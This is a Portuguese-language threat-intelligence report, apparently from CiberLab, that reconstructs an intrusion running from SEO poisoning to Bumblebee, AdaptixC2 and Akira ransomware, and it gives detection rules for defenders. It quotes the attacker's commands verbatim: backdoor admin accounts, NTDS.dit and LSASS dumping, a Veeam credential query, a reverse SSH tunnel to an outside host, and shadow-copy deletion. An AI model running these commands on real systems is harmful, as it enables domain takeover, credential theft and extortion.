Da busca no Bing ao ransomware em 44 horas: envenenamento de SEO, comprometimento do domínio e dupla extorsão
Um usuário procurou pelo ManageEngine OpManager no Bing e baixou, de um domínio sósia, um instalador MSI adulterado, que um administrador de TI executou num servidor. O loader Bumblebee entregou, cinco horas depois, um beacon do AdaptixC2. No segundo dia o ator já copiava o NTDS.dit do controlador de domínio; no terceiro, abriu um túnel SSH reverso para o RDP, extraiu a memória do LSASS de três hosts e exfiltrou cerca de 77 GB via SFTP. Cerca de 44 horas após o primeiro clique, o Akira começou a cifrar o domínio raiz; no quinto dia o ator voltou pelo RustDesk e cifrou o domínio filho.
O vetor não foi uma vulnerabilidade, e sim um resultado de busca. O instalador adulterado entregava o software legítimo junto com o malware, e foi executado por um administrador de TI num servidor, a partir de um compartilhamento interno. Com esse ponto de partida, o ator criou uma conta de Enterprise Admin já no primeiro dia e começou a cifrar o domínio raiz cerca de 44 horas depois. Numa intrusão paralela da mesma campanha, observada pelo Swisscom B2B CSIRT, o ransomware veio em 9 horas [1].
Em julho de 2025, uma organização foi comprometida a partir de uma busca comum no Bing. Um usuário que procurava pelo ManageEngine OpManager, ferramenta de monitoramento de redes, chegou ao domínio sósia opmanager[.]pro e baixou o arquivo ManageEngine-OpManager.msi. O instalador instalava o produto verdadeiro e, em paralelo, carregava o loader Bumblebee por carregamento lateral de DLL (DLL side-loading) [1]. O caso foi investigado pelo The DFIR Report, divulgado a clientes em julho de 2025, publicado como alerta em agosto de 2025 em parceria com o Swisscom B2B CSIRT (Computer Security Incident Response Team) e detalhado no relatório completo de 29 de junho de 2026, que reúne dados das duas intrusões [1] [2].
Cerca de cinco horas depois da execução, o Bumblebee entregou um beacon do AdaptixC2, framework de pós-exploração de código aberto, injetado numa cópia renomeada do Catálogo de Endereços do Windows [1] [3]. Ainda no primeiro dia o ator criou as contas backup_DA e backup_EA e incluiu a segunda no grupo Enterprise Admins. No segundo dia copiou o NTDS.dit com o wbadmin.exe e instalou o RustDesk; no terceiro abriu um túnel SSH reverso para o RDP de um controlador de domínio, extraiu a memória do LSASS de três hosts com o lsassy e exfiltrou cerca de 77 GB de um servidor de arquivos para um servidor na Ucrânia. As credenciais do Veeam foram extraídas do seu banco PostgreSQL [1].
A cifragem pelo Akira começou cerca de 44 horas após o acesso inicial, pelo servidor de backup. No quinto dia o ator voltou pelo RustDesk, chegou por RDP ao controlador do domínio filho e executou o ransomware 39 vezes nele [1].
Para quem defende uma rede Windows com Active Directory, três medidas atacam a cadeia no ponto mais barato: impedir que instaladores baixados da internet sejam executados em servidores, tratar a inclusão em grupos privilegiados e o wbadmin apontado para o NTDS.dit como incidentes imediatos, e bloquear SSH e SFTP de saída a partir de servidores internos [1]. Os IOCs (Indicators of Compromise) da seção 15 servem para caça retroativa; as detecções comportamentais da seção 13 continuam válidas quando a infraestrutura mudar.
Este relatório não se baseia em submissão a sandbox nem em análise de amostra pelo CiberLab. Todo o conteúdo técnico vem das referências, e quase todo do relatório completo do The DFIR Report [1], lido na íntegra a partir de uma cópia salva da página original. Comandos, endereços, hashes e contagens foram transcritos dessa fonte. Não houve execução dos artefatos em ambiente próprio.
| Campo | Valor |
|---|---|
| Período da intrusão | Julho de 2025, ao longo de cinco dias [1] |
| Investigação | The DFIR Report (Jake, Dino, Ahmed Farouk e Mattison Schuch; revisão de Angelo Violetti e Renzon Cruz), com dados da intrusão paralela do Swisscom B2B CSIRT [1] |
| Publicações | Alerta a clientes (julho de 2025), alerta público (agosto de 2025) e relatório completo (29 de junho de 2026) [1] [2] |
| Vetor inicial | Envenenamento de SEO (Search Engine Optimization) no Bing, busca por "ManageEngine OpManager" [1] |
| Domínios de entrada | opmanager[.]pro, redirecionando para download-center[.]online [1] |
| Instalador adulterado | ManageEngine-OpManager.msi, assinado com certificado revogado emitido para "LLC Resource+" [1] |
| Loader | Bumblebee (msimg32.dll), carregado lateralmente por consent.exe [1] |
| Framework de pós-exploração | AdaptixC2, beacon HTTP com configuração padrão, em AdgNsy.exe [1] [3] |
| Ransomware | Akira (C:\ProgramData\locker.exe) [1] |
| Tempo até o ransomware | Cerca de 44 horas no domínio raiz; domínio filho no quinto dia [1] |
| Dados exfiltrados | Cerca de 77 GB via FileZilla e SFTP, mais cerca de 2,5 GB pelo túnel SSH [1] |
| Artefato | Papel na intrusão |
|---|---|
| ManageEngine-OpManager.msi | Instalador adulterado: instala o OpManager legítimo e prepara o carregamento lateral [1] |
| consent.exe + msimg32.dll | Binário legítimo do Windows e a DLL do Bumblebee, gravados em ApplicationInstallationFolder_11 [1] |
| AdgNsy.exe | Cópia renomeada do WAB.exe com shellcode do AdaptixC2 injetado [1] |
| n.exe | SoftPerfect Network Scanner renomeado [1] |
| wbadmin.exe | Utilitário nativo de backup, usado para copiar o NTDS.dit e as colmeias SYSTEM e SECURITY [1] |
| psql.exe | Cliente do PostgreSQL, usado para ler as credenciais do banco do Veeam [1] |
| lsassy | Dump remoto da memória do LSASS via comsvcs.dll, sobre o Impacket [1] [6] |
| Invoke-ShareFinder | Enumeração de compartilhamentos SMB acessíveis, oriundo do PowerView [1] |
| RustDesk | Acesso remoto instalado como serviço, usado para reentrar no ambiente [1] |
| ssh.exe | Cliente SSH nativo do Windows, usado no túnel reverso para o RDP [1] |
| FileZilla 3.68.1 | Cliente SFTP usado na exfiltração principal [1] |
| locker.exe | Binário do ransomware Akira [1] |
Envenenamento de SEO é a manipulação de resultados de busca para que um site malicioso apareça no topo quando alguém procura por um termo específico [1] [4]. A técnica é eficaz contra profissionais de TI porque eles procuram exatamente os nomes de ferramentas administrativas. O download parece rotina, e o instalador, em vez de falhar, entrega o produto esperado junto com o malware. O The DFIR Report destaca que a escolha de imitar ferramentas como o ManageEngine é deliberada: mira usuários com privilégio elevado e aumenta a chance de execução em servidores críticos [1].
O Bumblebee é um loader: um malware cuja função é obter um ponto de apoio e carregar a etapa seguinte [1] [4]. Loaders separam o trabalho de conseguir o acesso do trabalho de explorá-lo. Por isso uma infecção por loader nunca deve ser tratada como "só um malware": neste caso, a mesma infecção levou ao comprometimento de toda a floresta do Active Directory.
O AdaptixC2 é um framework de pós-exploração e emulação adversária de código aberto, publicado para testes de invasão autorizados [3] [5]. Seus agentes falam HTTP, SMB e TCP, executam BOFs (Beacon Object Files) em memória e têm a configuração cifrada com RC4 [3]. A Unit 42 passou a observá-lo em ataques reais a partir de maio de 2025 [3]. Neste caso o beacon usou o perfil HTTP com as configurações padrão do framework, e o The DFIR Report conseguiu extrair a sua configuração da memória [1].
No carregamento lateral de DLL, o atacante coloca uma DLL maliciosa na mesma pasta de um executável legítimo que a importa. Pela ordem de busca de DLLs do Windows, o executável carrega primeiro a cópia da própria pasta, e o código malicioso roda dentro de um processo assinado pela Microsoft [1]. A msimg32.dll é uma dependência legítima e esperada do consent.exe, o binário das janelas de controle de conta de usuário, que em condições normais só existe em C:\Windows\System32 [1]. Um consent.exe fora dessa pasta é, por si só, um alerta de alta confiança (seção 13).
A intrusão faz parte de uma campanha de envenenamento de SEO com o Bumblebee identificada pela Cyjax em maio de 2025 [1]. A operação usava uma arquitetura padronizada em duas camadas [1]:
opmanager[.]pro e zenmap[.]pro, exibidos nos resultados do Bing, com cópias fiéis das páginas de download legítimas [1]./Get?q=<nome_da_ferramenta>, para servir pacotes diferentes a partir da mesma infraestrutura. O padrão é um bom ponto de pivotagem em plataformas como o urlscan.io [1].Foram observadas duas ondas de atividade, com infraestrutura sobreposta: todos os gateways resolviam para a Hostinger (AS47583) e compartilhavam um certificado de assinatura emitido para "LLC Vector" [1]:
| Característica | Onda 1 (maio de 2025) | Onda 2 (julho de 2025) |
|---|---|---|
| Ferramentas imitadas | WinMTR, Zenmap, RVTools, Milestone XProtect | ManageEngine OpManager, Advanced IP Scanner, MIB Browser |
| Gateways de download | download-server[.]online, soft-server[.]online | download-center[.]online, soft-hub[.]pro |
| Carregamento lateral | icardagt.exe e version.dll | consent.exe e msimg32.dll |
| Pasta de preparação | ApplicationInstallationFolder_11 | ApplicationInstallationFolder_11 |
| Padrão do DGA | 13 caracteres, .life | 14 caracteres, .org |
| Assinantes dos MSIs | LLC Ellada Comfort, LLC Best Consult, LLC Vector | LLC Resource+, LLC Ugurmana, LLC Leighton, LLC Vector |
Em outubro de 2025, a Zscaler documentou uma campanha paralela contra quem buscava pelo Ivanti VPN, com o mesmo modelo de duas camadas e o mesmo parâmetro /Get?q= [1]. Os gateways dessa campanha (netml[.]shop e shopping5[.]shop) usavam o mesmo IP de preparação na Hostinger (84.32.84[.]32) que o gateway soft-server[.]online da onda 1 [1]. As diferenças, porém, são relevantes: o payload era um ladrão de credenciais de VPN, e não o Bumblebee; o MSI era assinado por uma empresa chinesa (Hefei Qiangwei Network Technology); e o comando e controle usava um IP fixo no Azure (4.239.95[.]1:8080), sem DGA [1].
Na intrusão paralela, um administrador de TI acessou ip-scanner[.]org, que imitava o portal do Advanced IP Scanner, e baixou o Advanced-IP-Scanner.msi diretamente num servidor de gerência [1]. O restante da cadeia divergiu em pontos que interessam à detecção e são tratados nas seções seguintes: o beacon do AdaptixC2 veio após 40 minutos, a persistência usou o cloudflared, houve tentativa de desligar o antivírus com drivers vulneráveis e o ransomware começou após 9 horas [1].
A busca por "ManageEngine OpManager" no Bing levou o usuário a opmanager[.]pro, que redirecionou o download para download-center[.]online [1]. A análise forense do histórico do navegador reconstruiu a sequência de redirecionamentos [1]. O usuário moveu o MSI para um compartilhamento interno da rede, e dali um administrador de TI o copiou para um servidor e o executou a partir da área de trabalho; a telemetria mostra o explorer.exe como processo pai, confirmando a execução manual [1].
Um instalador que chega por um compartilhamento da própria empresa herda a confiança do local, não da origem. Não permita que software baixado da internet seja colocado em compartilhamentos de instalação sem conferir o hash contra o site do fabricante e a assinatura digital do fornecedor. Neste caso a assinatura era de um certificado revogado, emitido para uma empresa que não é a fabricante do produto [1].
O MSI gravou três binários na pasta ApplicationInstallationFolder_11, dentro do perfil do usuário [1]:
ManageEngine_OpManager_64bit.exe: o software legítimo, usado como isca para não levantar suspeita [1].consent.exe: binário legítimo do Windows, que inicia a cadeia de execução [1].msimg32.dll: o primeiro estágio do Bumblebee, carregado automaticamente pelo processo legítimo [1].Os metadados da DLL são palavras de dicionário sem sentido, um padrão conhecido do construtor do Bumblebee e útil para assinaturas YARA, porque essas cadeias praticamente não aparecem em software benigno [1]. A regra Sigma "System File Execution Location Anomaly" disparou nesta intrusão justamente pela execução do consent.exe fora do lugar [1].
Ao ser carregado, o Bumblebee consultou o idioma do sistema com GetSystemDefaultLocaleName() e o comparou com uma lista fixa de 27 localidades da CEI (Comunidade dos Estados Independentes), como Rússia, Ucrânia e Belarus; havendo coincidência, encerrava a própria execução [1]. Passada a verificação, o loader começou a consultar domínios gerados por algoritmo (DGA, Domain Generation Algorithm) e conectou-se a 188.40.187[.]145:443 e 109.205.195[.]211:443, por meio de dois desses domínios [1].
Cerca de cinco horas após a execução, o Bumblebee gravou o AdgNsy.exe, uma cópia renomeada do WAB.exe, e o executou por WMI (Windows Management Instrumentation), de modo que o processo nasceu sob o WmiPrvSE.exe [1]. A telemetria registrou:
ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
OriginalFileName: WAB.EXE
CommandLine: C:\Users\<redacted>\AppData\Local\AdgNsy.exe
Em seguida, o consent.exe controlado pelo Bumblebee abriu um handle sobre o AdgNsy.exe e injetou nele o shellcode do AdaptixC2 (seção 6.2). O beacon passou a falar com 172.96.137[.]160 e, a partir daí, o ator operou com um framework completo de pós-exploração [1]. Um pico de tráfego entre o Bumblebee e 109.205.195[.]211 no mesmo momento indica que esse endereço serviu o download do payload [1].
Remover o Bumblebee depois das primeiras cinco horas não encerra o incidente, porque o controle já está em outro processo, com outro canal. A contenção precisa isolar o host e procurar pelos dois canais. Não considere o host limpo após remover a DLL [1].
Os eventos do Sysmon registraram a criação de processo e a carga de imagem anômalas do consent.exe realocado, e a análise estática com o PEStudio confirmou que a msimg32.dll é uma dependência importada pelo binário legítimo [1].
O evento 10 do Sysmon (ProcessAccess) registrou o consent.exe obtendo um handle sobre o AdgNsy.exe logo após a sua execução, com uma pilha de chamadas passando por um módulo sem arquivo em disco [1]. A análise de memória do AdgNsy.exe mostrou uma thread com ponto de entrada fora da imagem do binário e várias regiões privadas com permissão de leitura, escrita e execução (RWX), além das cadeias de configuração do comando e controle, ausentes no arquivo em disco [1]. Reproduzindo a execução em laboratório, os analistas usaram o PE-sieve para extrair o módulo em memória do consent.exe, que continha rotinas de verificação de ambiente e de virtualização, manipulação de payload cifrado e injeção de processo [1] [7].
O evento 23 do Sysmon mostrou a exclusão dos loaders iniciais e de registros de reconhecimento para reduzir a pegada local [1]. O ator também alternou maiúsculas e minúsculas nos nomes dos executáveis, como CmD.eXe e pOWerShELl.exE, para escapar de assinaturas que comparam texto de forma sensível a caixa [1].
Não escreva regras de detecção que comparem nomes de processos ou linhas de comando diferenciando maiúsculas de minúsculas. O Windows ignora a caixa ao executar; o ator usou exatamente essa diferença para passar por assinaturas ingênuas [1].
Na intrusão paralela, o ator tentou neutralizar a proteção de endpoint com drivers vulneráveis (BYOVD, Bring Your Own Vulnerable Driver), gravados em %TEMP% e registrados como serviços [1]:
Service: mgdsrv | Path: ...\AppData\Local\Temp\rwdrv.sys
Service: KMHLPSVC | Path: ...\AppData\Local\Temp\hlpdrv.sys
O histórico de execução gráfica (artefato RecentApps) apontou utilitários "AV killer" em C:\ProgramData\av_kill_new\icardagt\icardagt.exe e C:\ProgramData\av_kill_old\mfpmp\mfpmp.exe, já apagados quando a coleta foi feita [1].
No primeiro dia, o ator criou duas contas de domínio com nomes que imitam contas de administração e incluiu uma delas no grupo Enterprise Admins, o de maior privilégio da floresta do Active Directory [1]:
net user backup_DA P@ssw0rd1234 /add /dom
net user backup_EA P@ssw0rd1234 /add /dom
net group "enterprise admins" backup_EA /add /dom
No segundo dia, o ator redefiniu com net user administrator P@ssw0rd! a senha do administrador local dos servidores de arquivos e de backup e, mais tarde, reativou a conta Administrator do domínio no controlador de domínio principal com net user administrator /active:yes /dom [1]. Ao longo da intrusão, alternou entre nove contas diferentes [1].
No segundo dia, o ator usou RDP para chegar a dois servidores e instalou neles o RustDesk, registrado como serviço do Windows e executado na bandeja do sistema (RustDesk.exe --tray) [1]. No terceiro dia reentrou por ele: um logon interativo (tipo 2) a partir de 127.0.0.1 seguido da execução do gerenciador de conexões (RustDesk.exe --cm) confirmou uma sessão remota, e os registros do RustDesk mostraram horas de compartilhamento de tela e de área de transferência [1]. No quinto dia, foi pelo RustDesk que o ator voltou para cifrar o domínio filho (seção 11).
Na intrusão paralela, a persistência num controlador de domínio veio do cloudflared, o cliente de túnel da Cloudflare, instalado como serviço por um script PowerShell chamado 1.ps1 [1]. O túnel sai da rede por HTTPS, dispensa abrir portas e passa pela infraestrutura da Cloudflare, que parece legítima. Pelos comentários e mensagens do script, o The DFIR Report avalia que ele provavelmente foi escrito com ferramentas de IA generativa [1].
Pelo beacon do AdaptixC2, logo após a sua chegada, o ator executou comandos nativos do Windows e disparou do próprio AdgNsy.exe uma varredura por portas de SMB, RDP e LDAP [1]:
/c systeminfo
/c nltest /dclist:
/c whoami /groups
/c nltest /domain_trusts
/c quser /server:REDACTED.lan
/c net group "domain admins" /dom
/c ping -n 1 REDACTED.lan
No segundo dia, já no controlador de domínio com uma conta nova, o ator repetiu systeminfo e as consultas net user e net group, e abriu no Bloco de Notas o registro do backup que acabara de fazer. No terceiro dia, rodou o SoftPerfect Network Scanner renomeado (n.exe) no controlador de domínio, cuja execução se confirma pelo tráfego SMB e pelo arquivo delete.me que a ferramenta cria ao testar permissão de escrita [1]. Nos servidores de arquivos e de backup, enumerou contas e grupos locais [1].
Ainda no terceiro dia, um script PowerShell enumerou os SPNs (Service Principal Names) de serviços específicos, resolveu os nomes para IPs e gravou o resultado em spn.txt; em seguida o ator executou [1]:
Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\programdata\shares.txt
No quinto dia, no controlador do domínio filho, o ator exportou todos os computadores e usuários do Active Directory e as zonas DNS, e repetiu o Invoke-ShareFinder e o script de SPNs [1]:
Get-ADComputer -Server 10.REDACTED -Filter * -Property * | Select-Object Enabled, Name,
DNSHostName, IPv4Address, OperatingSystem, ... | export-csv -path C:\ProgramData\AdComputers.csv
Get-ADUser -Server 10.REDACTED -Filter * -Properties * | Select-Object Enabled, CanonicalName,
SamAccountName, MemberOf, ... | export-csv -path C:\ProgramData\AdUsers.csv
Get-DnsServerZone -ComputerName REDACTED.lan
Export-DnsServerZone -Name "REDACTED.lan" -FileName "REDACTED.lan.txt"
Export-DnsServerZone -Name "TrustAnchors" -FileName "TrustAnchors.txt"
Os eventos 5145 (acesso a compartilhamento de rede) do servidor de arquivos mostraram uma varredura automatizada, imediatamente antes da instalação do FileZilla, por locais típicos de credenciais e dados sensíveis no perfil do Administrator [1]. O evento registra a tentativa mesmo quando a pasta não existe, então a lista mostra o que o ator procurou, não o que encontrou [1]:
| Categoria | Exemplos de caminhos |
|---|---|
| Credenciais do Windows | Chaves mestras da DPAPI (Microsoft\Protect), chaves RSA, certificados de usuário e o Gerenciador de Credenciais [1] |
| Navegadores | Perfis do Chrome, Edge, Brave e Firefox (senhas, cookies e preenchimento automático) [1] |
| Nuvem | .aws, gcloud, .azure e Azure PowerShell [1] |
| Gerenciadores de senha | 1Password, LastPass, KeePass, Dashlane, Bitwarden, RoboForm, StickyPassword, NordPass e Enpass [1] |
| Código-fonte | Pastas de projetos do Visual Studio, JetBrains, Android Studio, Xcode, NetBeans e outros [1] |
| Acesso remoto | Configurações e conexões salvas do mRemoteNG [1] |
| Outros | Backups do Notepad++ [1] |
No segundo dia, com a conta backup_EA, o ator chegou por RDP a um controlador de domínio e usou o wbadmin.exe para criar um backup com o NTDS.dit e as colmeias SYSTEM e SECURITY, preparados em C:\ProgramData [1]:
wbadmin.exe start backup -backuptarget:\\127.0.0.1\C$\ProgramData\
-include:C:\windows\NTDS\ntds.dit,C:\windows\system32\config\SYSTEM,C:\windows\system32\config\SECURITY
-quiet
O NTDS.dit é o banco do Active Directory, com os hashes de senha de todas as contas do domínio; com a colmeia SYSTEM, que guarda a chave para decifrá-los, o ator passa a poder quebrar ou reutilizar essas credenciais fora da rede. O uso do utilitário oficial de backup evita levar ferramentas conhecidas de dump ao controlador de domínio [1].
Mesmo já tendo privilégio de administrador de domínio, o ator extraiu as credenciais guardadas no banco PostgreSQL do Veeam, no servidor de backup. A consulta foi executada quatro vezes a partir de duas contas: três vezes em sessões RDP e uma vez remotamente por WMI, com um script PowerShell codificado que chamava o psql.exe [1]:
C:\Program Files\PostgreSQL\15\bin\psql.exe -U postgres --csv -d VeeamBackup -w
-c "SELECT user_name,password,description,change_time_utc FROM credentials"
O script decodificado decifrava as senhas pela DPAPI, tratando tanto o formato antigo do Veeam quanto o novo, com um salt fixo no código [1].
As credenciais que o Veeam guarda costumam ser as de maior alcance da rede, porque o backup precisa chegar a todos os servidores. Não trate o servidor de backup como área segura: isole-o da rede de produção, não o ingresse no domínio que ele protege e mantenha ao menos uma cópia imutável ou fora de linha. Neste caso, foi pelo servidor de backup que a cifragem começou [1].
No terceiro dia, o ator extraiu a memória do processo LSASS de três hosts com a técnica MiniDump da comsvcs.dll, alternando quatro métodos de execução remota por host em cerca de 50 segundos: serviço via SMB, WMI, tarefa agendada e DCOM (objeto MMC20.Application) [1]:
Image: C:\Windows\System32\rundll32.exe
CommandLine: rundll32.exe C:\windows\System32\comsvcs.dll, #+000024 <PID> \Windows\Temp\<random>.<ext> full
Os dumps foram gravados em \Windows\Temp com nomes aleatórios e extensões enganosas: G7wO.sys, U8Vfsh.docx e AsaZQZDJz.avhdx [1]. A ordem dos métodos (smb, wmi, task, mmc), as extensões e a pasta coincidem com os padrões do lsassy, que usa o Impacket por baixo, o que torna a atribuição à ferramenta de alta confiança [1] [6].
O principal vetor de movimento lateral foi o RDP nativo do Windows [1]. Com a conta backup_EA, o ator acessou quase todas as instâncias de RDP do ambiente; o salto decisivo foi do beachhead para o controlador de domínio [1].
No terceiro dia, já no controlador de domínio, o ator usou o cliente SSH nativo do Windows para abrir um túnel reverso até um servidor externo [1]:
ssh root@193.242.184[.]150 -R *:10400 -p22
A opção -R *:10400 abre a porta 10400 em todas as interfaces do servidor do ator e a liga a um recurso interno; os registros confirmaram a ligação com a porta local de RDP (3389). Com isso, o ator passou a ter acesso gráfico direto à rede interna, contornando o firewall [1]. Logo depois, houve logons no controlador de domínio a partir de estações chamadas WORK e kali [1]. A mesma técnica foi usada de novo, num outro servidor, no quinto dia; no caso do Swisscom, o túnel foi ssh -p22 socat1@83.229.17[.]60 -R 5554 [1].
Um túnel SSH reverso nasce de dentro para fora, então uma regra que só bloqueia conexões de entrada não o impede. Bloqueie SSH de saída a partir de servidores Windows, e não só o acesso ao RDP vindo de fora. Neste caso, foi um túnel de saída que expôs o RDP de um controlador de domínio à internet [1].
A tabela a seguir reúne os canais usados nas duas intrusões:
| Canal | Destino | Observação |
|---|---|---|
| Bumblebee | 188.40.187[.]145:443, 109.205.195[.]211:443 | Via domínios DGA .org de 14 caracteres; tentativas persistentes, que depois alcançaram também 171.22.183[.]43 [1] |
| AdaptixC2 | 172.96.137[.]160 | Beacon HTTP em AdgNsy.exe, hospedado na Shock Hosting; sem atividade entre os dias 3 e 5 [1] |
| RustDesk | Infraestrutura do RustDesk | Reentrada nos dias 3 e 5 [1] |
| Túnel SSH reverso | 193.242.184[.]150:22 | Exposição do RDP interno na porta remota 10400 [1] |
| AdaptixC2 (Swisscom) | 170.130.55[.]223 | Beacon injetado numa cópia do utilitário Contatos do Windows, após 40 minutos [1] |
| Cloudflared (Swisscom) | Cloudflare | RDP tunelado; conexões registradas a partir do endereço de loopback [1] |
A primeira transferência relevante ocorreu logo após a criação do túnel SSH no controlador de domínio: cerca de 2,5 GB saíram para 193.242.184[.]150 na porta 22, num período concentrado [1]. Os eventos 5145 mostram o acesso ao compartilhamento SYSVOL no mesmo momento, o que indica que a SYSVOL, com os objetos de política de grupo, scripts de logon e configurações do domínio, foi provavelmente exfiltrada [1].
O FileZilla foi o principal canal de exfiltração. No terceiro dia, cerca de 39 horas após o acesso inicial, o ator executou C:\ProgramData\FileZilla_3.68.1_win64_sponsored2-setup.exe no servidor de arquivos e conectou-se a 185.174.100[.]203:22, na Ucrânia [1]. O instalador foi criado pelo explorer.exe logo após execuções do rdpclip, o que indica que chegou pela área de transferência da sessão RDP [1]. Não houve compactação nem seleção aparente: o ator provavelmente levou arquivos dos compartilhamentos de forma indiscriminada, com interesse especial em dados de usuários e credenciais [1]:
| Sessão | Duração | Bytes transferidos | Cliente e servidor SSH |
|---|---|---|---|
| CTXU3p4hyiBMiOHgta | 16.362 s (cerca de 4,5 h) | 39.282.787.186 (39,28 GB) | FileZilla 3.68.1 para OpenSSH for Windows 9.8 [1] |
| C5YTxCs9PfDHuCQLd | 16.733 s (cerca de 4,6 h) | 41.177.980.833 (41,18 GB) | FileZilla 3.68.1 para OpenSSH for Windows 9.8 [1] |
O arquivo recentservers.xml do FileZilla mostrou o usuário Stark, com senha digitada a cada conexão (tipo de logon 2) e protocolo SFTP [1]. O destino estava na AS-COLOCROSSING [1]. Antes de cifrar o servidor de arquivos, o ator desinstalou o FileZilla, provavelmente para apagar vestígios da exfiltração [1].
Cerca de 44 horas após o acesso inicial, a cifragem começou pelo servidor de backup [1]:
C:\ProgramData\locker.exe -p=G:\ -n=15
A opção -p define o caminho a cifrar e -n, a porcentagem de cada arquivo que é cifrada, uma forma de acelerar a cifragem [1]. No servidor de arquivos o ransomware foi executado localmente; a partir do controlador de domínio, o ator usou as opções de execução remota para atingir compartilhamentos de rede e fez várias passagens adicionais por outros diretórios, acompanhando o progresso pelos registros gerados pelo próprio ransomware [1].
Em todos os hosts, cerca de um segundo após cada execução do locker.exe, o ransomware apagou as cópias de sombra de volume (Volume Shadow Copies) por WMI [1]:
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"
No quinto dia, o ator voltou pelo RustDesk, chegou por RDP ao controlador do domínio filho e executou o ransomware 39 vezes nesse host [1].
A cifragem do domínio raiz não foi o fim da intrusão. Não restaure serviços antes de remover as contas criadas pelo ator, desinstalar o RustDesk de todos os servidores, redefinir duas vezes a senha da conta KRBTGT e trocar as credenciais de todas as contas privilegiadas. Com o RustDesk ainda ativo, o ator voltou e cifrou o segundo domínio [1].
Nove horas após o acesso inicial, a cifragem começou pelo controlador de domínio. Antes, o ator desativou e encerrou, por WMIC, os serviços e processos de SQL e IIS dos hosts de uma lista, para liberar bancos de dados e sites à cifragem [1]:
wmic /node:@C:\temp\hosts1.txt /failfast:on service where "Name Like '%sql%'" call ChangeStartmode Disabled
wmic /node:@C:\temp\hosts1.txt /failfast:on service where "Name Like '%iis%'" call ChangeStartmode Disabled
wmic /node:@C:\temp1\hosts.txt /failfast:on process where "CommandLine Like '%sql%'" delete
.\win.exe -n=2 netonly
O ransomware, renomeado para win.exe e preparado em C:\ProgramData, foi executado com -n=2 e netonly, provavelmente para concentrar a cifragem nos recursos de rede [1].
Os horários exatos foram omitidos na publicação original; a tabela ordena os eventos pelo dia e pelos intervalos que a fonte informa [1]:
| Momento | Evento |
|---|---|
| Dia 1, T0 | Busca no Bing, download do MSI, cópia para o compartilhamento interno e execução no beachhead; o Bumblebee contata a infraestrutura DGA [1] |
| Dia 1, T0 + 5 h | Beacon AdaptixC2 em AdgNsy.exe; descoberta inicial e varredura de portas a partir do beacon [1] |
| Dia 1 | Criação de backup_DA e backup_EA; backup_EA incluída em Enterprise Admins [1] |
| Dia 2 | RDP ao controlador de domínio com backup_EA; cópia do NTDS.dit com wbadmin; troca de senhas de administrador local; RustDesk instalado em dois servidores [1] |
| Dia 3 | Reentrada pelo RustDesk; n.exe no controlador de domínio; RDP aos servidores de arquivos e de backup; Administrator do domínio reativado; SPNs e Invoke-ShareFinder [1] |
| Dia 3 | Túnel SSH reverso para 193.242.184[.]150 e cerca de 2,5 GB exfiltrados, com acesso à SYSVOL; dump do LSASS em três hosts [1] |
| Dia 3, T0 + 39 h | FileZilla no servidor de arquivos; exfiltração de cerca de 77 GB para 185.174.100[.]203 [1] |
| Dias 2 e 3 | Consultas às credenciais do Veeam, por RDP e por WMI [1] |
| T0 + 44 h | Akira começa pelo servidor de backup; em seguida servidor de arquivos e compartilhamentos a partir do controlador de domínio [1] |
| Dias 3 a 5 | Beacon do AdaptixC2 sem atividade [1] |
| Dia 5 | Reentrada pelo RustDesk; novo túnel SSH num outro servidor; RDP ao controlador do domínio filho; exportação do AD e do DNS; n.exe; Akira executado 39 vezes no controlador do domínio filho [1] |
A ordem vai do mais barato e abrangente ao mais caro e específico. As regras marcadas como derivadas foram escritas pelo CiberLab; a seção 13.7 lista as regras que o The DFIR Report publicou para o caso.
Pesquise nos registros de DNS e de proxy acessos às fachadas e gateways da tabela 3 e aos domínios DGA da seção 15, desde maio de 2025. Procure também pelo padrão de URL /Get?q= em domínios desconhecidos, característico dos gateways de entrega [1]. Qualquer acesso seguido do download de um arquivo .msi justifica verificar onde esse arquivo foi parar, inclusive em compartilhamentos internos.
Os endereços da campanha podem ser caçados em NetFlow e em sensores Suricata. Além das assinaturas da Emerging Threats listadas na seção 13.7, as regras abaixo alertam conexões de saída para os endereços da seção 15:
alert tcp $HOME_NET any -> [192.121.22.94,109.205.195.211,
188.40.187.145,171.22.183.43,194.127.178.21] any
(msg:"CIBERLAB BUMBLEBEE C2 AKIRA CAMPAIGN";
flow:to_server; classtype:trojan-activity; sid:1000101; rev:2;)
alert tcp $HOME_NET any -> [172.96.137.160,170.130.55.223] any
(msg:"CIBERLAB ADAPTIXC2 BEACON AKIRA CAMPAIGN";
flow:to_server; classtype:trojan-activity; sid:1000102; rev:2;)
alert tcp $HOME_NET any -> [193.242.184.150,185.174.100.203,
83.229.17.60] 22
(msg:"CIBERLAB AKIRA CAMPAIGN SSH TUNNEL OR SFTP EXFILTRATION";
flow:to_server; classtype:policy-violation; sid:1000103; rev:2;)
alert dns $HOME_NET any -> any any
(msg:"CIBERLAB BUMBLEBEE SEO POISONING DOMAIN LOOKUP"; dns.query;
pcre:"/(^|\.)(opmanager\.pro|zenmap\.pro|ip-scanner\.org|
download-center\.online|soft-hub\.pro|download-server\.online|
soft-server\.online)$/i";
classtype:trojan-activity; sid:1000104; rev:2;)
Independentemente dos endereços, alerte qualquer conexão SSH (porta 22) de saída originada em servidores Windows: foi o canal do túnel reverso e da exfiltração neste caso [1].
O consent.exe legítimo só existe nas pastas do sistema, e o WAB.exe legítimo fica em Windows Mail. As regras abaixo alertam o uso desses binários fora do lugar ou com outro nome. O campo OriginalFileName vem do cabeçalho do executável e não muda quando o arquivo é renomeado:
title: consent.exe Executado Fora das Pastas do Sistema (Bumblebee)
id: 02247b09-54b8-45ee-a382-35f35db8cbe0
status: experimental
description: Detecta consent.exe fora do System32, hospedeiro do carregamento lateral de msimg32.dll
author: Lucas Rayan Guerra (CiberLab)
references:
- https://thedfirreport.com/2026/06/29/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-3/
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\consent.exe'
filter_legit:
Image|startswith:
- 'C:\Windows\System32\'
- 'C:\Windows\SysWOW64\'
condition: selection and not filter_legit
falsepositives:
- Desconhecidos
level: high
tags:
- attack.defense_evasion
- attack.t1574.001
Para o beacon, a regra usa o nome original do executável e o processo pai:
title: WAB.exe Renomeado ou Iniciado por WMI (AdaptixC2)
id: b95ca178-8a4c-43a7-af7a-af2f37234716
status: experimental
